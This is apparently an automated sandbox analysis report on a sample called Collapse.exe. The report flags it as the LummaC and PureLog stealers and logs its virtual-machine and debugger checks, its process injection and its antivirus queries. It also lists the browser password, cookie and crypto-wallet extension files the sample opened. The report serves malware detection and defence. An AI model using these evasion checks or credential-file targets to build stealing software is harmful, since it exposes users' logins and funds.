                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\Desktop\Collapse.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeMemory allocated: 1910000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeMemory allocated: 52F0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeWindow / User API: threadDelayed 6569Jump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exe TID: 6252Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exe TID: 7544Thread sleep count: 6569 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\Desktop\Collapse.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\Collapse.exeLast function: Thread delayed
                          Source: Amcache.hve.4.drBinary or memory string: VMware
                          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Collapse.exe, 00000001.00000002.3295169809.00000000016AC000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\Collapse.exeAPI call chain: ExitProcess graph end nodegraph_1-22591
                          Source: C:\Users\user\Desktop\Collapse.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 1_2_0044C900 LdrInitializeThunk,1_2_0044C900
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_032F58D1 mov edi, dword ptr fs:[00000030h]0_2_032F58D1
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_032F5A4E mov edi, dword ptr fs:[00000030h]0_2_032F5A4E
                          Source: C:\Users\user\Desktop\Collapse.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\Collapse.exeCode function: 0_2_032F58D1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_032F58D1
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\Collapse.exeMemory written: C:\Users\user\Desktop\Collapse.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeProcess created: C:\Users\user\Desktop\Collapse.exe "C:\Users\user\Desktop\Collapse.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeQueries volume information: C:\Users\user\Desktop\Collapse.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Collapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\Collapse.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: 1.2.Collapse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.Collapse.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: Collapse.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Collapse.exe.f40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Collapse.exe.42f9550.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: Collapse.exe, 00000001.00000002.3295743874.0000000001733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3WXK?\b
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                          Source: Collapse.exe, 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
